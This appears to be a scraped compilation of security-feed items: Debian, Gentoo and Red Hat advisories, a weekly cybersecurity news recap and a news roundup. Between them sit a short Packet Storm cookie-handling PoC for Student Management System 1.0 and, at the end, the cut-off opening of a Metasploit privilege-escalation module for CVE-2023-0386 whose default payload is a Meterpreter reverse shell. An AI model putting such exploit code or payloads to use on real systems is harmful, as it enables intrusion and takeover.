Debian Linux Security Advisory 5776-1 - Albert Cervera discovered two missing authorisation checks in the Tryton application platform.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5776-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 27, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : tryton-serverCVE ID         : not yet availableAlbert Cervera discovered two missing authorisation checks in the Trytonapplication platform.For the stable distribution (bookworm), this problem has been fixed inversion 6.0.29-2+deb12u3.We recommend that you upgrade your tryton-server packages.For the detailed security status of tryton-server please refer toits security tracker page at:https://security-tracker.debian.org/tracker/tryton-serverFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmb22HYACgkQEMKTtsN8TjYf8xAAoc8InqgoBx9Bi6v5l6aDgE/H7d5AukdJFN3Z4Wurua9O/7G1uE7WlFsm6PdTOey1aeFy6EpGIWev98ehGYLJOHDyK270eEgQVAXVVsjnpXtq9L/6lW/5+yEUPJ1jhG21XcDpuuh8QMtBgdCO6NQ/tk7lTbc+4OLsfNayZ6+UBDQMZ0cWnn2YShEVeZlZBm8dMFJYbGyG9Vgqzw1xA4Z9QkYJRqkQfgx+0fdszVHnxmtKBmoSBUOPCIYYRXvn8HG+/qWWf5D9f4q+iYDOcX1gEyieTqayqaeni0Q4vf8XtEt5gqpnou2OIs9EAoRrnyKJt3ZT4hptXlv6jFaK1sIgiBL+myARN535L/BZFQav+QMT5jpClZWglfZF7J29IOkY3uy/eHv+Dd0XUbfqKDVfPVnOkDaHYcBUhyuUkYJ20J7C1Sk41VJGUK9rgL3YkIX9PxZFlx9LUh2NMO+NhqLAPN1E7V2CXLcS34a41NlsEpOGkJ3W+2tuLBvFVYbs9ArnNCAS324J++VPOnL7D3ZH3oa3bqh9VyTban75UgPkkOjY6A53412W3xh1Wig7ZJkYgzLr1LueSTQtzG7dHXPbGaiIZA+oIVhygYJAFkm3nHMOK8vIbL1qzKcdZfRRQGZRPiD9SRoz41IyBwL/55uNCNYQHVEBFaKjqHNp1L+yp/o==a8Sz-----END PGP SIGNATURE-----

Debian Security Advisory 5776-1

Gentoo Linux Security Advisory 202409-28 - Multiple vulnerabilities have been discovered in HashiCorp Consul, the worst of which could result in denial of service. Versions greater than or equal to 1.15.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-28  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: HashiCorp Consul: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #885997  
       ID: 202409-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in HashiCorp Consul, the  
worst of which could result in denial of service.

Background  
==========

HashiCorp Consul is a tool for service discovery, monitoring and  
configuration.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
app-admin/consul  < 1.15.10     >= 1.15.10

Description  
===========

Multiple vulnerabilities have been found in HashiCorp Consul. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the CVE identifiers referenced below for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All HashiCorp Consul users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/consul-1.15.10"

References  
==========

[ 1 ] CVE-2022-41717  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41717

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-28

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-28

Gentoo Linux Security Advisory 202409-27 - A vulnerability has been found in tmux which could result in application crash. Versions greater than or equal to 3.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: tmux: Null Pointer Dereference  
     Date: September 28, 2024  
     Bugs: #891783  
       ID: 202409-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been found in tmux which could result in application  
crash.

Background  
==========

tmux is a terminal multiplexer.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
app-misc/tmux  < 3.4         >= 3.4

Description  
===========

A null pointer dereference issue was discovered in function  
window_pane_set_event in window.c in which allows attackers to cause  
denial of service or other unspecified impacts.

Impact  
======

Manipulating tmux window state could result in a null pointer  
dereference.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All tmux users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-misc/tmux-3.4"

References  
==========

[ 1 ] CVE-2022-47016  
      https://nvd.nist.gov/vuln/detail/CVE-2022-47016

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-27

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-27

Gentoo Linux Security Advisory 202409-26 - Multiple vulnerabilities have been found in IcedTea, the worst of which could result in arbitrary code execution. Versions less than or equal to 3.21.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202409-26  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: IcedTea: Multiple Vulnerabilities  
     Date: September 28, 2024  
     Bugs: #732628, #803608, #877599  
       ID: 202409-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in IcedTea, the worst of which  
could result in arbitrary code execution.

Background  
==========

IcedTea’s aim is to provide OpenJDK in a form suitable for easy  
configuration, compilation and distribution with the primary goal of  
allowing inclusion in GNU/Linux distributions.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
dev-java/icedtea      <= 3.21.0     Vulnerable!  
dev-java/icedtea-bin  <= 3.16.0-r2  Vulnerable!

Description  
===========

Multiple vulnerabilities have been discovered in IcedTea. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

Gentoo has discontinued support for IcedTea. We recommend that users  
unmerge it:

  # emerge --sync  
  # emerge --ask --depclean "dev-java/icedtea" "dev-java/icedtea-bin"

References  
==========

[ 1 ] CVE-2020-14556  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14556  
[ 2 ] CVE-2020-14562  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14562  
[ 3 ] CVE-2020-14573  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14573  
[ 4 ] CVE-2020-14577  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14577  
[ 5 ] CVE-2020-14578  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14578  
[ 6 ] CVE-2020-14579  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14579  
[ 7 ] CVE-2020-14581  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14581  
[ 8 ] CVE-2020-14583  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14583  
[ 9 ] CVE-2020-14593  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14593  
[ 10 ] CVE-2020-14621  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14621  
[ 11 ] CVE-2020-14664  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14664  
[ 12 ] CVE-2020-14779  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14779  
[ 13 ] CVE-2020-14781  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14781  
[ 14 ] CVE-2020-14782  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14782  
[ 15 ] CVE-2020-14792  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14792  
[ 16 ] CVE-2020-14796  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14796  
[ 17 ] CVE-2020-14797  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14797  
[ 18 ] CVE-2020-14798  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14798  
[ 19 ] CVE-2020-14803  
      https://nvd.nist.gov/vuln/detail/CVE-2020-14803  
[ 20 ] CVE-2021-2341  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2341  
[ 21 ] CVE-2021-2369  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2369  
[ 22 ] CVE-2021-2388  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2388  
[ 23 ] CVE-2021-2432  
      https://nvd.nist.gov/vuln/detail/CVE-2021-2432  
[ 24 ] CVE-2021-35550  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35550  
[ 25 ] CVE-2021-35556  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35556  
[ 26 ] CVE-2021-35559  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35559  
[ 27 ] CVE-2021-35561  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35561  
[ 28 ] CVE-2021-35564  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35564  
[ 29 ] CVE-2021-35565  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35565  
[ 30 ] CVE-2021-35567  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35567  
[ 31 ] CVE-2021-35578  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35578  
[ 32 ] CVE-2021-35586  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35586  
[ 33 ] CVE-2021-35588  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35588  
[ 34 ] CVE-2021-35603  
      https://nvd.nist.gov/vuln/detail/CVE-2021-35603  
[ 35 ] CVE-2022-21618  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21618  
[ 36 ] CVE-2022-21619  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21619  
[ 37 ] CVE-2022-21624  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21624  
[ 38 ] CVE-2022-21626  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21626  
[ 39 ] CVE-2022-21628  
      https://nvd.nist.gov/vuln/detail/CVE-2022-21628  
[ 40 ] CVE-2022-39399  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39399  
[ 41 ] CVE-2023-21830  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21830  
[ 42 ] CVE-2023-21835  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21835  
[ 43 ] CVE-2023-21843  
      https://nvd.nist.gov/vuln/detail/CVE-2023-21843

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202409-26

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202409-26

Red Hat Security Advisory 2024-7346-03 - An update for cups-filters is now available for Red Hat Enterprise Linux 9. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7346.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: cups-filters security updateAdvisory ID:        RHSA-2024:7346-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7346Issue date:         2024-09-27Revision:           03CVE Names:          CVE-2024-47076====================================================================Summary: An update for cups-filters is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The cups-filters package contains back ends, filters, and other software that was once part of the core Common UNIX Printing System (CUPS) distribution but is now maintained independently. Security Fix(es):* cups-browsed: cups-browsed binds on UDP INADDR_ANY:631 trusting any packet from any source ()* cups-filters: libcupsfilters: `cfGetPrinterAttributes` API does not perform sanitization on returned IPP attributes (CVE-2024-47076)* cups: libppd: remote command injection via attacker controlled data in PPD file ()For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-47076References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2314252https://bugzilla.redhat.com/show_bug.cgi?id=2314253https://bugzilla.redhat.com/show_bug.cgi?id=2314256

Red Hat Security Advisory 2024-7346-03

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

**Student Management System 1.0 Insecure Cookie Handling**

Posted Sep 30, 2024

Authored by indoushka

Student Management System version 1.0 suffers from an insecure cookie handling vulnerability.

tags | exploit, insecure cookie handling

SHA-256 | d658fbfc8c6a719141fdd1f2794283b78eab23b21c7970420e8965f026849eba

Download | Favorite | View

**Student Management System 1.0 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Student Management System 1.0 Insecure Cookie Handling Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/student-management-system-using-php-and-mysql/                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] The default username is admin & The chosen password is user123[+] http://127.0.0.1/studentms/admin/dashboard.php Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,997)
*   Arbitrary (17,113)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,047)
*   Code Execution (7,925)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,434)
*   DoS (25,304)
*   Encryption (2,395)
*   Exploit (54,342)
*   File Inclusion (4,278)
*   File Upload (1,022)
*   Firewall (822)
*   Info Disclosure (2,924)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,310)
*   Local (14,864)
*   Magazine (587)
*   Overflow (13,228)
*   Perl (1,435)
*   PHP (5,284)
*   Proof of Concept (2,413)
*   Protocol (3,751)
*   Python (1,662)
*   Remote (31,922)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,052)
*   Shell (3,308)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,738)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,133)
*   Web (10,144)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,306)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,130)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,374)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,912)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,882)
*   UNIX (9,461)
*   UnixWare (188)
*   Windows (6,780)
*   Other

Student Management System 1.0 Insecure Cookie Handling

Hold onto your hats, folks, because the cybersecurity world is anything but quiet! Last week, we dodged a bullet when we discovered vulnerabilities in CUPS that could've opened the door to remote attacks. Google's switch to Rust is paying off big time, slashing memory-related vulnerabilities in Android.
But it wasn't all good news – Kaspersky's forced exit from the US market left users with more

Cybersecurity / Weekly Recap

Hold onto your hats, folks, because the cybersecurity world is anything but quiet! Last week, we dodged a bullet when we discovered vulnerabilities in CUPS that could've opened the door to remote attacks. Google's switch to Rust is paying off big time, slashing memory-related vulnerabilities in Android.

But it wasn't all good news – Kaspersky's forced exit from the US market left users with more questions than answers. And don't even get us started on the Kia cars that could've been hijacked with just a license plate!

Let's unpack these stories and more, and arm ourselves with the knowledge to stay safe in this ever-evolving digital landscape.

****⚡ Threat of the Week****

**Flaws Found in CUPS:** A new set of security vulnerabilities has been disclosed in the OpenPrinting Common Unix Printing System (CUPS) on Linux systems that could permit remote command execution under certain conditions. Red Hat Enterprise Linux tagged the issues as Important in severity, given that the real-world impact is likely to be low due to the prerequisites necessary to pull off a successful exploit.

****🔔 Top News****

*   **Google's Touts Shift to Rust:** The pivot to memory-safe languages such as Rust for Android has led to the percentage of memory-safe vulnerabilities discovered in Android dropping from 76% to 24% over a period of six years. The development comes as Google and Arm's increased collaboration has made it possible to flag multiple shortcomings and elevate the overall security of the GPU software/firmware stack across the Android ecosystem.
*   **Kaspersky Exits U.S. Market:** Russian cybersecurity vendor Kaspersky, which has been banned from selling its products in the U.S. due to national security concerns, raised concerns after some found that their installations have been automatically removed and replaced by antivirus software from a lesser-known company called UltraAV. Kaspersky said it began notifying customers of the transition earlier this month, but it appears that it was not made clear that the software would be forcefully migrated without requiring any user action. Pango, which owns UltraUV, said users also had the option of canceling their subscription directly with Kaspersky's customer service team.
*   **Kia Cars Could Be Remotely Controlled with Just License Plates:** A set of now patched vulnerabilities in Kia vehicles that could have allowed remote control over key functions simply by using only a license plate. They could also let attackers covertly gain access to sensitive information including the victim's name, phone number, email address, and physical address. There is no evidence that these vulnerabilities were ever exploited in the wild.
*   **U.S. Sanctions Cryptex and PM2BTC:** The U.S. government sanctioned two cryptocurrency exchanges Cryptex and PM2BTC for allegedly facilitating the laundering of cryptocurrencies possibly obtained through cybercrime. In tandem, an indictment was unsealed against a Russian national, Sergey Sergeevich Ivanov, for his purported involvement in the operation of several money laundering services that were offered to cybercriminals.
*   **3 Iranian Hackers Charged:** In yet another law enforcement action, the U.S. government charged three Iranian nationals, Masoud Jalili, Seyyed Ali Aghamiri, and Yasar (Yaser) Balaghi, who are allegedly employed with the Islamic Revolutionary Guard Corps (IRGC) for their targeting of current and former officials to steal sensitive data in an attempt to interfere with the upcoming elections. Iran has called the allegations baseless.

****📰 Around the Cyber World****

*   **Mysterious Internet Noise Storms Detailed:** Threat intelligence firm GreyNoise said it has been tracking large waves of "Noise Storms" containing spoofed internet traffic comprising TCP connections and ICMP packets since January 2020, although the exact origins and its intended purpose remain unknown. An intriguing aspect of the inexplicable phenomenon is the presence of a "LOVE" ASCII string in the generated ICMP packets, reinforcing the hypothesis that it could be used as a covert communications channel. "Millions of spoofed IPs are flooding key internet providers like Cogent and Lumen while strategically avoiding AWS — suggesting a sophisticated, potentially organized actor with a clear agenda," it said. "Although traffic appears to originate from Brazil, deeper connections to Chinese platforms like QQ, WeChat, and WePay raise the possibility of deliberate obfuscation, complicating efforts to trace the true source and purpose."
*   **Tails and Tor Merge Operations:** The Tor Project, the non-profit that maintains software for the Tor (The Onion Router) anonymity network, is joining forces with Tails (short for The Amnesic Incognito Live System), the maker of a portable Linux-based operating system that uses Tor. "Incorporating Tails into the Tor Project's structure allows for easier collaboration, better sustainability, reduced overhead, and expanded training and outreach programs to counter a larger number of digital threats," the organizations said. The move "feels like coming home," intrigeri, Tails OS team lead said.
*   **NIST Proposes New Password Rules:** The U.S. National Institute of Standards and Technology (NIST) has outlined new guidelines that suggest credential service providers (CSPs) stop recommending passwords using several character types and stop mandating periodic password changes unless the authenticator has been compromised. Other notable recommendations include passwords should be anywhere between 15 and 64 characters long, as well as ASCII and Unicode characters should be allowed when setting them.
*   **PKfail More Broader Than Previously Thought:** A critical firmware supply chain issue known as PKfail (CVE-2024-8105), which allows attackers to bypass Secure Boot and install malware, has been now found to impact more devices, including medical devices, desktops, laptops, gaming consoles, enterprise servers, ATMs, PoS terminals, and even voting machines. Binarly has described PKfail as a "great example of a supply chain security failure impacting the entire industry."
*   **Microsoft Revamps Recall:** When Microsoft released its AI-powered feature Recall in May 2024, it was met with near instantaneous backlash over privacy and security concerns, and for making it easier for threat actors to steal sensitive data. The company subsequently delayed a wider rollout pending under-the-hood changes to ensure that the issues were addressed. As part of the new updates, Recall is no longer enabled by default and can be uninstalled by users. It also moves all of the screenshot processing to a Virtualization-based Security (VBS) Enclave. Furthermore, the company said it engaged an unnamed third-party security vendor to perform an independent security design review and penetration test.

**🔥 **Cybersecurity Resources & Insights****

*   **Upcoming Webinars**
    *   **Overloaded with Logs? Let's Fix Your SIEM:** Legacy SIEMs are overwhelmed. The answer isn't more data... It's better oversight. Join Zuri Cortez and Seth Geftic as they break down how we went from data overload to security simplicity without sacrificing performance. Save your seat today and simplify your security game with our Managed SIEM.
    *   **Strategies to Defeat Ransomware in 2024**: Ransomware attacks are up by 17.8%, and ransom payouts are reaching all-time highs. Is your organization prepared for the escalating ransomware threat? Join us for an exclusive webinar where Emily Laufer, Director of Product Marketing at Zscaler, will unveil insights from the Zscaler ThreatLabz 2024 Ransomware Report. Register now and secure your spot!
*   **Ask the Expert**
    *   **Q:** How can organizations secure device firmware against vulnerabilities like PKfail, and what technologies or practices should they prioritize?
    *   **A:** Securing firmware isn't just about patching—it's about protecting the very core of your devices where threats like PKfail hide in plain sight. Think of firmware as the foundation of a skyscraper; if it's weak, the entire structure is at risk. Organizations should prioritize implementing secure boot mechanisms to ensure only trusted firmware loads, use firmware vulnerability scanning tools to detect and address issues proactively, and deploy runtime protections to monitor for malicious activities. Partnering closely with hardware vendors for timely updates, adopting a zero-trust security model, and educating employees about firmware risks are also crucial. In today's cyber landscape, safeguarding the firmware layer is essential—it's the bedrock of your entire security strategy.

****🔒 Tip of the Week****

**Prevent Data Leaks to AI Services:** Protect sensitive data by enforcing strict policies against sharing with external AI platforms, deploying DLP tools to block confidential transmissions, restricting access to unauthorized AI tools, training employees on the risks, and using secure, in-house AI solutions.

****Conclusion****

Until next time, remember, cybersecurity is not a sprint, it's a marathon. Stay vigilant, stay informed, and most importantly, stay safe in this ever-evolving digital world. Together, we can build a more secure online future.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Last Week's Top Threats and Trends (September 23-29)

Plus: The US Justice Department indicts three Iranians over Trump campaign hack, EU regulators fine Meta $100 million for a password security lapse, and the Tor Project enters a new phase.

Researchers found a vulnerability in a Kia web portal that allowed them to track millions of cars, unlock doors, honk horns, and even start engines in seconds, just by reading the car's license plate. The findings are the latest in a string of web bugs that have impacted dozen of carmakers. Meanwhile, a handful of Tesla Cybertrucks have been outfitted for war and are literally being-battle tested by Chechen forces fighting in Ukraine as part of Russia’s ongoing invasion.

As Israel escalates its attacks on Lebanon, civilians on both sides of the conflict have been receiving ominous text messages—and authorities in each country are accusing the other of psychological warfare. The US government has increasingly condemned Russia-backed media outlets like RT for working closely with Russian intelligence—and many digital platforms have removed or banned their content. But they’re still influential and trusted alternative sources of information in many parts of the world.

And there's more. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**New Digital Identity Guidelines Strike Back at Dreadful Password Policies**

A new draft of the US National Institute of Standards and Technology's “Digital Identity Guidelines” finally takes steps to eliminate reviled password management practices that have been shown to do more harm than good. The recommendations, which will be mandatory for US federal government entities and serve as guidelines for everyone else, ban the practice of requiring users to periodically change their account passwords, often every 90 days.

The policy of regularly changing passwords evolved out of a desire to ensure that people weren't choosing easily guessable or reused passwords; but in practice, it causes people to choose simple or formulaic passwords so they will be easier to keep track of. The new recommendations also ban “composition rules,” like requiring a certain number or mix of capital letters, numbers, and punctuation marks in each password. NIST writes in the draft that the goal of the Digital Identity Guidelines is to provide “foundational risk management processes and requirements that enable the implementation of secure, private, equitable, and accessible identity systems.”

**DOJ Indicts Alleged Iranian Hackers Over Trump Campaign Breach**

The US Department of Justice unsealed charges on Friday against three Iranian men who allegedly compromised Donald Trump’s presidential campaign and leaked stolen data to media outlets. Microsoft and Google warned last month that an Iranian state-sponsored hacking group known as APT42 had targeted both the Joe Biden and Donald Trump presidential campaigns, and successfully breached the Trump campaign. The DOJ claims the hackers compromised a dozen people as part of its operation, including a journalist, a human rights advocate, and several former US officials. More broadly, the US government has said in recent weeks that Iran is attempting to interfere in the 2024 election.

“The defendants’ own words made clear that they were attempting to undermine former President Trump’s campaign in advance of the 2024 U.S. presidential election,” Attorney General Merrick Garland said at a press conference on Friday. "We know that Iran is continuing with its brazen efforts to stoke discord, erode confidence in the US electoral process, and advance its malign activities.”

**Irish Regulator Fines Meta More Than $100 Million Over 2019 Password Lapse**

The Irish Data Protection Commission fined Meta €91 million, or roughly $101 million, on Friday for a password storage lapse in 2019 that violated the European Union's General Data Protection Regulation. Following a report by Krebs on Security, the company acknowledged in March 2019 that a bug in its password management systems had caused hundreds of millions of Facebook, Facebook Lite, and Instagram passwords to be stored without protection in plaintext in an internal platform. Ireland's privacy watchdog launched its investigation into the incident in April 2019.

“It is widely accepted that user passwords should not be stored in plaintext, considering the risks of abuse that arise from persons accessing such data," Irish DPC deputy commissioner Graham Doyle said in a statement. “It must be borne in mind that the passwords, the subject of consideration in this case, are particularly sensitive, as they would enable access to users’ social media accounts.”

**The Tor Project and the Tails Privacy Operating System Are Merging**

The digital anonymity nonprofit the Tor Project is merging with privacy- and anonymity-focused Linux-based operating system Tails. Pavel Zoneff, the Tor Project’s communications director, wrote in a blog post on Thursday that the move will facilitate collaboration and reduce costs, while expanding both groups' reach. “Tor and Tails provide essential tools to help people around the world stay safe online,” he wrote. “By joining forces, these two privacy advocates will pool their resources to focus on what matters most: ensuring that activists, journalists, other at-risk and everyday users will have access to improved digital security tools.”

The US Could Finally Ban Inane Forced Password Changes

This Metasploit module exploit targets the Linux kernel bug in OverlayFS. A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::File  include Msf::Post::Linux::Priv  include Msf::Post::Linux::Kernel  include Msf::Post::Linux::System  include Msf::Post::Linux::Compile  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Local Privilege Escalation via CVE-2023-0386',        'Description' => %q{          This exploit targets the Linux kernel bug in OverlayFS.          A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities          was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount.          This uid mapping bug allows a local user to escalate their privileges on the system.        },        'License' => MSF_LICENSE,        'Author' => [          'xkaneiki', # Exploit development          'sxlmnwb', # Exploit development          'Takahiro Yokoyama', # Metasploit Module        ],        'DisclosureDate' => '2023-03-22',        'SessionTypes' => ['shell', 'meterpreter'],        'Platform' => [ 'linux' ],        'Arch' => [          ARCH_X64,        ],        'Targets' => [['Automatic', {}]],        'DefaultTarget' => 0,        'DefaultOptions' => {          'AppendExit' => true,          'PrependFork' => true,          'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'        },        'Privileged' => true,        'References' => [          [ 'CVE', '2023-0386' ],          [ 'URL', 'https://github.com/sxlmnwb/CVE-2023-0386' ],          [ 'URL', 'https://github.com/DataDog/security-labs-pocs/tree/main/proof-of-concept-exploits/overlayfs-cve-2023-0386' ],          [ 'URL', 'https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/' ],          [ 'URL', 